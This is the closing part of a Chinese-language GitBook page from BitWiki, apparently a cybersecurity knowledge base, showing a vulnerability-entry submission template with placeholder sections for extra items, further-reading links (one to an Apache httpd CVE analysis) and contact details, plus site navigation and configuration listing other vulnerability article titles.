<h2 id="0x08-&#x5197;&#x4F59;&#x9879;"><a name="0x08-&#x5197;&#x4F59;&#x9879;" class="anchor-navigation-ex-anchor" href="#0x08-&#x5197;&#x4F59;&#x9879;"><i class="fa fa-link" aria-hidden="true"></i></a>0x08 &#x5197;&#x4F59;&#x9879;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x4E0D;&#x9650;&#x5236;&#x6BB5;&#x843D;&#x6570;&#x91CF;&#xFF0C;&#x6839;&#x636E;&#x9700;&#x6C42;&#x6DFB;&#x52A0;</p>
</blockquote>
<h2 id="0x09-&#x6269;&#x5C55;&#x94FE;&#x63A5;"><a name="0x09-&#x6269;&#x5C55;&#x94FE;&#x63A5;" class="anchor-navigation-ex-anchor" href="#0x09-&#x6269;&#x5C55;&#x94FE;&#x63A5;"><i class="fa fa-link" aria-hidden="true"></i></a>0x09 &#x6269;&#x5C55;&#x94FE;&#x63A5;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x4E3B;&#x8981;&#x64B0;&#x5199;&#x6269;&#x5C55;&#x9605;&#x8BFB;&#x94FE;&#x63A5;&#xFF0C;&#x4EE5;&#x53CA;&#x8BE6;&#x7EC6;&#x5206;&#x6790;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x6587;&#x7AE0;&#x7B49;</p>
</blockquote>
<p><a href="https://n0b1ta.github.io/Apache-httpd-CVE-2021-41773-and-CVE-2021-42013-%E6%BC%8F%E6%B4%9E%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90" target="_blank">Apache Httpd Cve 2021 41773 And Cve 2021 42013 &#x6F0F;&#x6D1E;&#x8BE6;&#x7EC6;&#x5206;&#x6790;</a></p>
<h2 id="0x10-&#x8054;&#x7CFB;&#x65B9;&#x5F0F;"><a name="0x10-&#x8054;&#x7CFB;&#x65B9;&#x5F0F;" class="anchor-navigation-ex-anchor" href="#0x10-&#x8054;&#x7CFB;&#x65B9;&#x5F0F;"><i class="fa fa-link" aria-hidden="true"></i></a>0x10 &#x8054;&#x7CFB;&#x65B9;&#x5F0F;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x4E3B;&#x8981;&#x64B0;&#x5199;&#x8BE5;&#x6587;&#x7AE0;&#x7684;&#x8054;&#x7CFB;&#x65B9;&#x5F0F;&#xFF0C;&#x5728;&#x5BA1;&#x6838;&#x7ED3;&#x675F;&#x540E;&#x4F1A;&#x6839;&#x636E;&#x4F5C;&#x8005;&#x610F;&#x613F;&#x4FDD;&#x7559; / &#x5220;&#x9664;</p>
</blockquote>
<p>&#x4F5C;&#x8005; : BitWiki&#x652F;&#x6301;&#x56E2;&#x961F;</p>

<script>console.log("plugin-popup....");document.onclick = function(e){ e.target.tagName === "IMG" && window.open(e.target.src,e.target.src)}</script><style>img{cursor:pointer}</style>
                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="./" class="navigation navigation-prev " aria-label="Previous page: 提交模板">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="../../漏洞文库/Apache/" class="navigation navigation-next " aria-label="Next page: Apache">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"漏洞文库模板","level":"1.3.1","depth":2,"next":{"title":"Apache","level":"2.1","depth":1,"path":"漏洞文库/Apache/README.md","ref":"漏洞文库/Apache/README.md","articles":[{"title":"Log4j2","level":"2.1.1","depth":2,"path":"漏洞文库/Apache/Log4j2/README.md","ref":"漏洞文库/Apache/Log4j2/README.md","articles":[{"title":"CVE 2021 44428  Log4j2  2.14.X 存在JNDI RCE漏洞","level":"2.1.1.1","depth":3,"path":"漏洞文库/Apache/Log4j2/CVE-2021-44428  log4j2  2.14.x 存在JNDI RCE漏洞.md","ref":"漏洞文库/Apache/Log4j2/CVE-2021-44428  log4j2  2.14.x 存在JNDI RCE漏洞.md","articles":[]}]},{"title":"TomCat","level":"2.1.2","depth":2,"path":"漏洞文库/Apache/TomCat/README.md","ref":"漏洞文库/Apache/TomCat/README.md","articles":[{"title":"CVE 2017 12615 Tomcat  存在PUT请求文件上传漏洞","level":"2.1.2.1","depth":3,"path":"漏洞文库/Apache/TomCat/CVE-2017-12615 Tomcat  存在PUT请求文件上传漏洞.md","ref":"漏洞文库/Apache/TomCat/CVE-2017-12615 Tomcat  存在PUT请求文件上传漏洞.md","articles":[]},{"title":"CVE 2020 1938 Tomcat  存在AJP 文件包含漏洞","level":"2.1.2.2","depth":3,"path":"漏洞文库/Apache/TomCat/CVE-2020-1938 Tomcat  存在AJP 文件包含漏洞.md","ref":"漏洞文库/Apache/TomCat/CVE-2020-1938 Tomcat  存在AJP 文件包含漏洞.md","articles":[]},{"title":"Tomcat 管理后台弱口令导致的文件上传GetShell","level":"2.1.2.3","depth":3,"path":"漏洞文库/Apache/TomCat/Tomcat 管理后台弱口令导致的文件上传GetShell.md","ref":"漏洞文库/Apache/TomCat/Tomcat 管理后台弱口令导致的文件上传GetShell.md","articles":[]}]}]},"previous":{"title":"提交模板","level":"1.3","depth":1,"path":"杂七杂八/提交模板/README.md","ref":"杂七杂八/提交模板/README.md","articles":[{"title":"漏洞文库模板","level":"1.3.1","depth":2,"path":"杂七杂八/提交模板/漏洞文库模板.md","ref":"杂七杂八/提交模板/漏洞文库模板.md","articles":[]}]},"dir":"ltr"},"config":{"plugins":["codeblock-filename","summary","chapter-fold","copy-code-button","-sharing","-lunr","search-pro","splitter","github-buttons","insert-logo","custom-favicon","popup","back-to-top-button","advanced-emoji","theme-comscore","rss","hide-element","anchor-navigation-ex","livereload"],"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"pluginsConfig":{"chapter-fold":{},"livereload":{},"summary":{},"splitter":{},"search-pro":{},"search":{},"popup":{},"hide-element":{"elements":[".gitbook-link"]},"fontsettings":{"theme":"white","family":"sans","size":2},"rss":{"categories":["gitbook"],"title":"BitWiki","description":"A permanently free and open source knowledge base for cyber security | 一个永久免费 、开源的网络安全知识库","author":"BitWiki支持团队","feed_url":"https://wiki.1bit.win/doc/rss","site_url":"https://wiki.1bit.win/","managingEditor":"team@onebit.tk","webMaster":"team@onebit.tk"},"highlight":{},"anchor-navigation-ex":{"associatedWithSummary":true,"float":{"floatIcon":"fa fa-navicon","level1Icon":"","level2Icon":"","level3Icon":"","showLevelIcon":false},"mode":"float","multipleH1":true,"pageTop":{"level1Icon":"","level2Icon":"","level3Icon":"","showLevelIcon":false},"printLog":false,"showGoTop":true,"showLevel":false},"favicon":"../images/favicon.ico","codeblock-filename":{},"theme-comscore":{},"back-to-top-button":{},"github-buttons":{"repo":"Bitwiki/bitwiki.github.io","types":["star","watch","fork"],"size":"small"},"custom-favicon":{},"copy-code-button":{},"advanced-emoji":{"embedEmojis":false},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false},"insert-logo":{"style":"background: none; max-height: 60px; min-height: 60px","url":"../images/BitWiki.png"}},"theme":"default","author":"BitWiki支持团队","pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"variables":{},"language":"zh-hans","links":{"sidebar":{"OneBit安全团队":"https://onebitsec.github.io/","GitHub":"https://github.com/BitWiki/bitwiki.github.io"}},"gitbook":"*","description":"A permanently free and open source knowledge base for cyber security | 一个永久免费 、开源的网络安全知识库"},"file":{"path":"杂七杂八/提交模板/漏洞文库模板.md","mtime":"2021-12-20T03:31:21.701Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2022-03-18T11:31:49.665Z"},"basePath":"../..","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="../../gitbook/gitbook.js"></script>
    <script src="../../gitbook/theme.js"></script>
    
        
        <script src="../../gitbook/gitbook-plugin-chapter-fold/chapter-fold.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-copy-code-button/toggle.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search-pro/jquery.mark.min.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search-pro/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-splitter/splitter.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-github-buttons/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-insert-logo/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-back-to-top-button/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-rss/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-hide-element/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-theme-comscore/test.js"></script>
        
    

    </body>
</html>

